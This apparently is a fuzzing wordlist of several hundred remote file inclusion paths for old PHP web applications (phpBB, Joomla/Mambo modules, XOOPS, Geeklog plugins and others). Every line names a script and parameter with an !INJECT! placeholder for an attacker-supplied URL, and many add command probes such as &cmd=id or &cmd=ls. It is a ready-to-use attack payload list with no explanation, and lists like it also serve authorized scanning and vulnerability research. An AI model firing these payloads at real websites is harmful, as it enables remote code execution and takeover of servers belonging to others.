/index.php?blog_theme=!INJECT!
/index.php?body=!INJECT!
/index.php?class_path=!INJECT!?
/index.php?classified_path=!INJECT!?
/index.php?cms=!INJECT!?
/index.php?config["sipssys"]=!INJECT!
/index.php?config[root_ordner]=!INJECT!?&cmd=id
/index.php?config[root_ordner]=!INJECT!?cmd=id
/index.php?config_atkroot=!INJECT!
/index.php?configuration=!INJECT!
/index.php?custom_admin_path=!INJECT!?
/index.php?dateiPfad=!INJECT!?&cmd=ls
/index.php?de=!INJECT!
/index.php?dept=!INJECT!
/index.php?do=!INJECT!
/index.php?exec=!INJECT!?
/index.php?ext=!INJECT!
/index.php?faq_path=!INJECT!?&cmd=id
/index.php?file_name[]=!INJECT!?
/index.php?file_path=!INJECT!?
/index.php?fileloc=!INJECT!
/index.php?from=!INJECT!
/index.php?func=!INJECT!?
/index.php?function=!INJECT!
/index.php?function=custom&custom=!INJECT!
/index.php?gOo=!INJECT!
/index.php?gen=!INJECT!
/index.php?get=!INJECT!
/index.php?home_name=!INJECT!
/index.php?ilang=!INJECT!?
/index.php?inc_dir=!INJECT!
/index.php?inc_dir=!INJECT!?
/index.php?includeDir=!INJECT!
/index.php?includeFooter=!INJECT!
/index.php?includesdir=!INJECT!
/index.php?insPath=!INJECT!
/index.php?lang=!INJECT!
/index.php?language=!INJECT!?
/index.php?language=en&main_page=!INJECT!
/index.php?lizge=!INJECT!?&cmd=ls
/index.php?lng=!INJECT!
/index.php?load=!INJECT!
/index.php?loadpage=!INJECT!
/index.php?main_tabid=1&main_content=!INJECT!
/index.php?may=!INJECT!
/index.php?middle=!INJECT!
/index.php?mode=!INJECT!
/index.php?modpath=!INJECT!
/index.php?module=PostWrap&page=!INJECT!
/index.php?mosConfig_absolute_path=!INJECT!
/index.php?news7["functions"]=!INJECT!
/index.php?news_include_path=!INJECT!
/index.php?open=!INJECT!
/index.php?option=com_custompages&cpage=!INJECT!?
/index.php?page=!INJECT!
/index.php?page=!INJECT!%00
/index.php?page=!INJECT!?
/index.php?page!INJECT!
/index.php?page[path]=!INJECT!?&cmd=ls
/index.php?pagename=!INJECT!
/index.php?pager=!INJECT!
/index.php?pagina=!INJECT!?
/index.php?path_to_folder=!INJECT!?cmd=id
/index.php?pg=!INJECT!?
/index.php?phpbb_root_path=!INJECT!
/index.php?plugin=!INJECT!
/index.php?principal=!INJECT!
/index.php?proMod=!INJECT!
/index.php?proMod=!INJECT!?cmd
/index.php?project=!INJECT!
/index.php?repinc=!INJECT!?
/index.php?root_prefix=!INJECT!
/index.php?root_prefix=!INJECT!?
/index.php?section=!INJECT!
/index.php?site=!INJECT!
/index.php?site_path=!INJECT!
/index.php?styl[top]=!INJECT!??
/index.php?template=!INJECT!?
/index.php?templates_dir=!INJECT!?
/index.php?theme=!INJECT!
/index.php?themepath=!INJECT!?
/index.php?themesdir=!INJECT!
/index.php?this_path=!INJECT!?
/index.php?txt=!INJECT!
/index.php?up=!INJECT!
/index.php?url=!INJECT!
/index.php?w=!INJECT!
/index.php?way=!INJECT!??????????????
/index1.php?=!INJECT!
/index1.php?inc=!INJECT!
/index1.php?inhalt=!INJECT!
/index2.php?=!INJECT!
/index2.php?content=!INJECT!
/index2.php?s=!INJECT!
/index2.php?x=!INJECT!
/indexinfo.php?bibtexrootrel=!INJECT!?
/indexk.php?lib_path=!INJECT!?
/info.php?file=!INJECT!
/inhalt.php?dateien[news]=!INJECT!?
/init.php?API_HOME_DIR=!INJECT!
/init.php?scriptpath=!INJECT!?
/initialize.php?hmail_config[includepath]=!INJECT!&cmd=dir
/initiate.php?abs_path=!INJECT!
/install.php?_NE[AbsPath]=!INJECT!
/install.php?install_dir=!INJECT!
/install/config.php?path=!INJECT!
/install/di.php?pathtoserverdata=!INJECT!
/install/index.php?content_php=!INJECT!
/install/install3.php?database=none&cabsolute_path=!INJECT!
/integration/shortstat/configuration.php?SPL_CFG[dirroot]=!INJECT!?
/interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=!INJECT!?
/interact/modules/scorm/lib.inc.php?CONFIG[BASE_PATH]=!INJECT!?
/interface/billing/billing_process.php?srcdir=!INJECT!?
/interface/editors/-custom.php?bField[bf_data]=!INJECT!
/interface/editors/custom.php?bField[bf_data]=!INJECT!
/interface/new/new_patient_save.php?srcdir=!INJECT!?
/intern/admin/?rootdir=!INJECT!
/intern/admin/other/backup.php?admin=1&rootdir=!INJECT!
/intern/clan/member_add.php?rootdir=!INJECT!
/intern/config/forum.php?rootdir=!INJECT!
/intern/config/key_2.php?rootdir=!INJECT!
/ip.inc.php?type=1&cgipath=!INJECT!
/ipeer_site/?page=!INJECT!?
/joinus.php?vwar_root=!INJECT!
/joinus.php?vwar_root=!INJECT!?&cmd=ls
/joomla_path/administrator/components/com_x-shop/admin.x-shop?mosConfig_absolute_path=!INJECT!?
/joomla_path/components/com_articles.php?absolute_path=!INJECT!?
/js/bbcodepress/bbcode-form.php?BBCODE_path=!INJECT!
/js/wptable-tinymce.php?ABSPATH=!INJECT!
/jscript.php?my_ms[root]=!INJECT!?
/kernel/class/ixpts.class.php?IXP_ROOT_PATH=!INJECT!
/kernel/loadkernel.php?installPath=!INJECT!
/kmitaadmin/kmitam/htmlcode.php?file=!INJECT!?
/ktmlpro/includes/ktedit/toolbar.php?dirDepth=!INJECT!
/lang/leslangues.php?fichier=!INJECT!
/lang_english/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_english/lang_activity.php?phpbb_root_path=!INJECT!
/language/lang_english/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_admin_album.php?phpbb_root_path=!INJECT!?a=
/language/lang_german/lang_main_album.php?phpbb_root_path=!INJECT!?a=
/latestposts.php?forumspath=!INJECT!
/latex.php?bibtexrootrel=!INJECT!?
/layout/default/params.php?gConf[dir][layouts]=!INJECT!?
/ldap/authldap.php?includePath=!INJECT!
/learnPath/include/scormExport.inc.php?includePath=!INJECT!
/lib.editor.inc.php?sys_path=!INJECT!?
/lib/Loggix/Module/Calendar.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Comment.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Rss.php?pathToIndex=!INJECT!
/lib/Loggix/Module/Trackback.php?pathToIndex=!INJECT!
/lib/action/rss.php?lib=!INJECT!?
/lib/activeutil.php?set[include_path]=!INJECT!?
/lib/addressbook.php?GLOBALS[basedir]=!INJECT!
/lib/armygame.php?libpath=!INJECT!
/lib/authuser.php?root=!INJECT!
/lib/base.php?BaseCfg[BaseDir]=!INJECT!
/lib/connect.php?root=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!
/lib/connected_users.lib.php3?ChatPath=!INJECT!?
/lib/db/mysql.class.php?root=!INJECT!
/lib/db/postgres.class.php?root=!INJECT!
/lib/functions.php?DOC_ROOT=!INJECT!
/lib/googlesearch/GoogleSearch.php?APP[path][lib]=!INJECT!?
/lib/header.php?DOC_ROOT=!INJECT!
/lib/language.php?_LIB_DIR=!INJECT!
/lib/live_status.lib.php?ROOT=!INJECT!
/lib/misc.php?root=!INJECT!
/lib/nl/nl.php?g_strRootDir=!INJECT!
/lib/obj/collection.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/obj/content_image.class.php?GLOBALS[application][app_root]=!INJECT!
/lib/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/pcltrace.lib.php?g_pcltar_lib_dir=!INJECT!
/lib/rs.php?rootpath=!INJECT!
/lib/selectlang.php?BBC_LANGUAGE_PATH=!INJECT!
/lib/smarty/SmartyFU.class.php?system[smarty][dir]=!INJECT!?
/lib/static/header.php?set_menu=!INJECT!
/lib/tpl.inc.php?conf[classpath]=!INJECT!
/libraries/comment/postComment.php?path[cb]=!INJECT!?a=
/libraries/database.php?path=!INJECT!???
/libraries/lib-remotehost.inc.php?phpAds_geoPlugin=!INJECT!
/libraries/pcl/pcltar.php?g_pcltar_lib_dir=!INJECT!
/library/authorize.php?login_form=!INJECT!?
/library/translation.inc.php?GLOBALS[srcdir]=!INJECT!?
/libs/db.php?path_local=!INJECT!
/libs/ftp.php?path_local=!INJECT!
/libs/lom.php?ETCDIR=!INJECT!
/libsecure.php?abs_path=!INJECT!?
/license.php?CONFIG[MWCHAT_Libs]=!INJECT!?
/link_main.php?phpbb_root_path=!INJECT!
/linkadmin.php?page=!INJECT!?
/linksnet_newsfeed/linksnet_linkslog_rss.php?dirpath_linksnet_newsfeed=!INJECT!?
/list.php?phpbb_root_path=!INJECT!
/lms_path/modules/userpanel.php?CONFIG[directories][userpanel_dir]=!INJECT!
/lms_path/modules/welcome.php?_LIB_DIR=!INJECT!
/load_lang.php?_SERWEB[configdir]=!INJECT!
/load_lang.php?_SERWEB[serwebdir]=!INJECT!
/load_phplib.php?_PHPLIB[libdir]=!INJECT!
/loader.php?GLOBALS=!INJECT!
/local/lib/lcUser.php?LIBDIR=!INJECT!?
/log.php?bibtexrootrel=!INJECT!?
/login.php3?cl_headers=!INJECT!
/login.php?base_dir=!INJECT!
/login.php?blog_theme=!INJECT!
/login.php?langfile=!INJECT!
/login.php?pachtofile=!INJECT!
/login.php?srcdir=!INJECT!?
/login.php?value=!INJECT!??
/lovecms/install/index.php?step=!INJECT!?
/m2f/m2f_cron.php?m2f_root_path=!INJECT!
/m2f/m2f_forum.php?m2f_root_path=!INJECT!
/m2f/m2f_mailinglist.php?m2f_root_path=!INJECT!
/m2f/m2f_phpbb204.php?m2f_root_path=!INJECT!
/maguz.php?site=!INJECT!
/mail/childwindow.inc.php?form=!INJECT!?
/mail/content/fnc-readmail3.php?__SOCKETMAIL_ROOT=!INJECT!?
/mail_this_entry/mail_autocheck.php?pm_path=!INJECT!?&cmd=ls
/main.inc.php?pathtoscript=!INJECT!
/main.php?config[search_disp]=true&include_dir=!INJECT!
/main.php?id=!INJECT!
/main.php?include_path=!INJECT!?
/main.php?pageURL=!INJECT!
/main.php?pagina=!INJECT!
/main/forum/komentar.php?site_path=!INJECT!
/main/main.php?pi=!INJECT!
/main/ppcbannerclick.php?INC=!INJECT!?
/main/ppcclick.php?INC=!INJECT!?
/main_prepend.php?_SERWEB[functionsdir]=!INJECT!
/mainpage.php?docroot=!INJECT!?cmd
/mamboleto.php?mosConfig_absolute_path=!INJECT!
/mambots/editors/path/jscripts/tiny_mce/plugins/preview/preview.php?mosConfig_absolute_path=!INJECT!
/manage_songs.php?foing_root_path=!INJECT!
/manager/admin/index.php?MGR=!INJECT!
/manager/admin/p_ins.php?MGR=!INJECT!
/manager/admin/u_ins.php?MGR=!INJECT!
/manager/articles.php?_PX_config[manager_path]=!INJECT!
/manager/static/view.php?propID=0&INC=!INJECT!
/master.php?root_path=!INJECT!
/mcNews/admin/header.php?skinfile=!INJECT!
/mcf.php?content=!INJECT!
/mcnews/admin/install.php?l=!INJECT!
/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]=!INJECT!
/member.php?vwar_root=!INJECT!
/member/usercp_menu.php?script_folder=!INJECT!
/members/index.php?INC=!INJECT!?
/members/registration.php?INC=!INJECT!?
/members_help.php?hlp=!INJECT!?
/membres/membreManager.php?include_path=!INJECT!?
/menu.php3?cl_headers=!INJECT!
/menu.php?functions_file=!INJECT!
/mep/frame.php?chem=!INJECT!?
/microcms/includes/file_manager/special.php?fm_includes_special=!INJECT!
/middle.php?file=!INJECT!
/migrateNE2toNE3.php?_NE[AbsPath]=!INJECT!
/mindmeld/acweb/admin_index.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/ask.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/learn.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/manage.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/mind.inc.php?MM_GLOBALS[home]=!INJECT!?
/mindmeld/include/sensory.inc.php?MM_GLOBALS[home]=!INJECT!?
/mini-pub.php/front-end/img.php?sFileName=!INJECT!?
/minimal/wiki.php?page=!INJECT!?
/misc/function.php3?path=!INJECT!?
/mitglieder.php?config[root_ordner]=!INJECT!?&cmd=id
/mkportal/include/user.php?MK_PATH=!INJECT!
/mkportal/include/user.php?MK_PATH=!INJECT!?
/mod/authent.php4?rootpath=!INJECT!
/mod/image/index.php?config[pathMod]=!INJECT!
/mod/liens/index.php?config[pathMod]=!INJECT!
/mod/liste/index.php?config[pathMod]=!INJECT!
/mod/special/index.php?config[pathMod]=!INJECT!
/mod/texte/index.php?config[pathMod]=!INJECT!
/mod_membre/inscription.php?chemin=!INJECT!?
/mod_phpalbum/sommaire_admin.php?chemin=!INJECT!?
/modernbill/include/html/config.php?DIR=!INJECT!
/modifyform.html?code=!INJECT!
/mods/business_functions.php?GALLERY_BASEDIR=!INJECT!
/mods/config/load.inc.php?moddir=!INJECT!?
/mods/http/load.inc.php?moddir=!INJECT!?
/mods/ui_functions.php?GALLERY_BASEDIR=!INJECT!
/module/forum/forum.php?fd=!INJECT!=';
/module/forum/main.php?id=1&main_dir=!INJECT!?&
/modules.php?name=!INJECT!&file=article&sid=2
/modules/4nAlbum/public/displayCategory.php?basepath=!INJECT!
/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=!INJECT!
/modules/Calendar/admin/update.php?calpath=!INJECT!?
/modules/Calendar/calendar.php?calpath=!INJECT!?
/modules/Calendar/scheme.php?calpath=!INJECT!?
/modules/Discipline/CategoryBreakdownTime.php?FocusPath=!INJECT!
/modules/Discipline/CategoryBreakdownTime.php?staticpath=!INJECT!
/modules/Discipline/StudentFieldBreakdown.php?staticpath=!INJECT!
/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/My_eGallery/index.php?basepath=!INJECT!
/modules/My_eGallery/public/displayCategory.php?basepath=!INJECT!
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=!INJECT!?
/modules/NukeAI/util.php?AIbasedir=!INJECT!
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=!INJECT!
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/modules/abook/foldertree.php?baseDir==!INJECT!?
/modules/addons/plugin.php?doc_root=!INJECT!
/modules/admin/include/config.php?doc_root=!INJECT!
/modules/admin/include/localize.php?doc_root=!INJECT!
/modules/agendax/addevent.inc.php?agendax_path=!INJECT!&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=!INJECT!?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=!INJECT!
/modules/birstday/birst.php?exbb[home_path]=!INJECT!?
/modules/birstday/profile_show.php?exbb[home_path]=!INJECT!?
/modules/birstday/select.php?exbb[home_path]=!INJECT!?
/modules/blocks/headerfile.php?system[path]=!INJECT!
/modules/calendar/index.php?inc_dir=!INJECT!
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=!INJECT!?
/modules/calendar/mod_calendar.php?absolute_path=!INJECT!?
/modules/certinfo/index.php?full_path=!INJECT!
/modules/character_roster/include.php?mod_root=!INJECT!?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=!INJECT!?
/modules/coppermine/themes/default/theme.php?THEME_DIR=!INJECT!
/modules/downloads/lib/LM_Downloads.php?pathToIndex=!INJECT!
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=!INJECT!
/modules/emails/index.php?full_path=!INJECT!
/modules/events/index.php?full_path=!INJECT!
/modules/fax/index.php?full_path=!INJECT!
/modules/files/blocks/latest_files.php?system[path]=!INJECT!
/modules/files/index.php?full_path=!INJECT!
/modules/files/list.php?full_path=!INJECT!
/modules/filters/headerfile.php?system[path]=!INJECT!
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=!INJECT!?
/modules/forums/blocks/latest_posts.php?system[path]=!INJECT!
/modules/global/inc/content.inc.php?sIncPath=!INJECT!?
/modules/groupadm/index.php?full_path=!INJECT!
/modules/groups/headerfile.php?system[path]=!INJECT!
/modules/guestbook/index.php?CONFIG[local_root]=!INJECT!?
/modules/history/index.php?full_path=!INJECT!
/modules/home.module.php?repmod=!INJECT!?
/modules/horoscope/footer.php?xoopsConfig[root_path]=!INJECT!
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=!INJECT!
/modules/info/index.php?full_path=!INJECT!
/modules/links/blocks/links.php?system[path]=!INJECT!
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=!INJECT!
/modules/log/index.php?full_path=!INJECT!
/modules/mail/index.php?full_path=!INJECT!
/modules/menu/headerfile.php?system[path]=!INJECT!
/modules/messages/index.php?full_path=!INJECT!
/modules/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=!INJECT!
/modules/mod_calendar.php?absolute_path=!INJECT!
/modules/mod_flatmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_mainmenu.php?mosConfig_absolute_path=!INJECT!
/modules/mod_weather.php?absolute_path=!INJECT!?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=!INJECT!?
/modules/newbb_plus/config.php?bbPath[root_theme]=!INJECT!
/modules/newbb_plus/votepolls.php?bbPath[path]=!INJECT!
/modules/news/blocks/latest_news.php?system[path]=!INJECT!
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=!INJECT!?
/modules/organizations/index.php?full_path=!INJECT!
/modules/phones/index.php?full_path=!INJECT!
/modules/pms/index.php?module_path=!INJECT!???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=!INJECT!?
/modules/presence/index.php?full_path=!INJECT!
/modules/projects/index.php?full_path=!INJECT!
/modules/projects/list.php?full_path=!INJECT!
/modules/projects/summary.inc.php?full_path=!INJECT!
/modules/punish/p_error.php?exbb[home_path]=!INJECT!?
/modules/punish/profile.php?exbb[home_path]=!INJECT!?
/modules/reports/index.php?full_path=!INJECT!
/modules/search/index.php?full_path=!INJECT!
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=!INJECT!?
/modules/settings/headerfile.php?system[path]=!INJECT!
/modules/snf/index.php?full_path=!INJECT!
/modules/syslog/index.php?full_path=!INJECT!
/modules/tasks/index.php?full_path=!INJECT!
/modules/tasks/searchsimilar.php?full_path=!INJECT!
/modules/tasks/summary.inc.php?full_path=!INJECT!
/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=!INJECT!
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=!INJECT!
/modules/useradm/index.php?full_path=!INJECT!
/modules/users/headerfile.php?system[path]=!INJECT!
/modules/vWar_Account/includes/functions_common.php?vwar_root2=!INJECT!
/modules/visitors2/include/config.inc.php?lvc_include_dir=!INJECT!?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=!INJECT!
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xfsection/modify.php?dir_module=!INJECT!
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=!INJECT!?
/modulistica/mdl_save.php?CLASSPATH=!INJECT!
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=!INJECT!?
/moodle/admin/utfdbmigrate.php?cmd=!INJECT!
/moosegallery/display.php?type=!INJECT!?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=!INJECT!
/moteur/moteur.php?chemin=!INJECT!?
/movie_cls.php?full_path=!INJECT!
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=!INJECT!
/music/buycd.php?HTTP_DOCUMENT_ROOT=!INJECT!?
/mutant_includes/mutant_functions.php?phpbb_root_path=!INJECT!
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=!INJECT!
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=!INJECT!
/mygallery/myfunctions/mygallerybrowser.php?myPath=!INJECT!
/myphpcommander_path/system/lib/package.php?gl_root=!INJECT!?cmd
/mysave.php?file=!INJECT!
/naboard_pnr.php?skin=!INJECT!?
/ncaster/admin/addons/archive/archive.php?adminfolder=!INJECT!
/network_module_selector.php?path_prefix=!INJECT!
/news.php?CONFIG[script_path]=!INJECT!?
/news.php?config[root_ordner]=!INJECT!?&cmd=id
/news.php?scriptpath=!INJECT!?
/news.php?vwar_root=!INJECT!
/news/include/createdb.php?langfile;=!INJECT!?
/news/include/customize.php?l=!INJECT!?
/news/newstopic_inc.php?indir=!INJECT!
/news/scripts/news_page.php?script_path=!INJECT!?
/newsadmin.php?action=!INJECT!
/newsarchive.php?path_to_script=!INJECT!?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=!INJECT!
/newsfeeds/includes/controller.php?zf_path=!INJECT!
/newsletter/newsletter.php?waroot=!INJECT!
/newsp/lib/class.Database.php?path=!INJECT!?
/newticket.php?lang=!INJECT!
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=!INJECT!
/noticias.php?inc=!INJECT!?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=!INJECT!
/nuke_path/iframe.php?file=!INJECT!
/nukebrowser.php?filnavn=!INJECT!&filhead=!INJECT!&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=!INJECT!?
/oaboard_en/forum.php?inc=!INJECT!
/ocp-103/index.php?req_path=!INJECT!
/ocs/include/footer.inc.php?fullpath=!INJECT!?
/ocs/include/theme.inc.php?fullpath=!INJECT!?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=!INJECT!?
/olbookmarks-0.7.4/themes/test1.php?!INJECT!
/oneadmin/adminfoot.php?path[docroot]=!INJECT!
/oneadmin/blogger/sampleblogger.php?path[docroot]=!INJECT!?
/oneadmin/config-bak.php?include_once=!INJECT!
/oneadmin/config.php?path[docroot]=!INJECT!
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=!INJECT!?
/online.php?config[root_ordner]=!INJECT!?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=!INJECT!?
/openi-admin/base/fileloader.php?config[openi_dir]=!INJECT!
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=!INJECT!???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=!INJECT!
/ops/gals.php?news_file=!INJECT!
/order/login.php?svr_rootscript=!INJECT!
/osData/php121/php121db.php?php121dir=!INJECT!%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=!INJECT!?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=!INJECT!?
/owimg.php3?path=!INJECT!
/p-news.php?pn_lang=!INJECT!
/pafiledb/includes/pafiledb_constants.php?module_root_path=!INJECT!
/page.php?goto=!INJECT!
/page.php?id=!INJECT!
/panel/common/theme/default/header_setup.php?path[docroot]=!INJECT!
/param_editor.php?folder=!INJECT!?
/parse/parser.php?WN_BASEDIR=!INJECT!
/patch/?language_id=!INJECT!
/patch/tools/send_reminders.php?noSet=0&includedir=!INJECT!?
/paypalipn/ipnprocess.php?INC=!INJECT!?
/pda/pda_projects.php?offset=!INJECT!
/phfito/phfito-post?SRC_PATH=!INJECT!
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=!INJECT!
/photo_comment.php?toroot=!INJECT!
/php-inc/log.inc.php?SKIN_URL=!INJECT!
/php-include-robotsservices.php?page=!INJECT!
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=!INJECT!
/php.incs/common.inc.php?cm_basedir=!INJECT!?
/php/init.gallery.php?include_class=!INJECT!/something
/php121db.php?php121dir=!INJECT!%00
/php4you.php?dir=!INJECT!?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=!INJECT!?
/phpBB2/shoutbox.php?phpbb_root_path=!INJECT!
/phpCards.header.php?CardPath=!INJECT!?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=!INJECT!
/phpMyChat.php3?=!INJECT!?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=!INJECT!?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=!INJECT!?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=!INJECT!
/phpbb/sendmsg.php?phpbb_root_path=!INJECT!
/phpcalendar/includes/calendar.php?phpc_root_path=!INJECT!?
/phpcalendar/includes/setup.php?phpc_root_path=!INJECT!?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=!INJECT!
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=!INJECT!
/phphd_downloads/common.php?phphd_real_path=!INJECT!
/phphost_directoryv2/include/admin.php?rd=!INJECT!?
/phphtml.php?htmlclass_path=!INJECT!
/phpi/edit_top_feature.php?include_connection=!INJECT!
/phpi/edit_topics_feature.php?include_connection=!INJECT!
/phplib/site_conf.php?ordnertiefe=!INJECT!
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/referenz.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=!INJECT!
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=!INJECT!
/phplinks/includes/smarty.php?full_path_to_public_program=!INJECT!
/phporacleview/inc/include_all.inc.php?page_dir=!INJECT!?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=!INJECT!?
/phpquickgallery/gallery_top.inc.php?textFile=!INJECT!
/phpreactor/inc/polls.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/users.inc.php?pathtohomedir=!INJECT!?
/phpreactor/inc/view.inc.php?pathtohomedir=!INJECT!?
/phpress/adisplay.php?lang=!INJECT!
/phpunity-postcard.php?plgallery_epost=1&gallery_path=!INJECT!?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=!INJECT!
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=!INJECT!
/phpyabs/moduli/libri/index.php?Azione=!INJECT!
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=!INJECT!
/playlist.php?phpbb_root_path=!INJECT!
/plugin/HP_DEV/cms2.php?s_dir=!INJECT!?
/plugin/gateway/gnokii/init.php?apps_path[plug]=!INJECT!?
/plugins/1_Adressbuch/delete.php?folder=!INJECT!
/plugins/BackUp/Archive.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=!INJECT!?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=!INJECT!?
/plugins/links/functions.inc?_CONF[path]=!INJECT!
/plugins/polls/functions.inc?_CONF[path]=!INJECT!
/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=!INJECT!?
/plugins/safehtml/safehtml.php?dir[plugins]=!INJECT!?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/Import.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=!INJECT!
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=!INJECT!
/plugins/staticpages/functions.inc?_CONF[path]=!INJECT!
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=!INJECT!
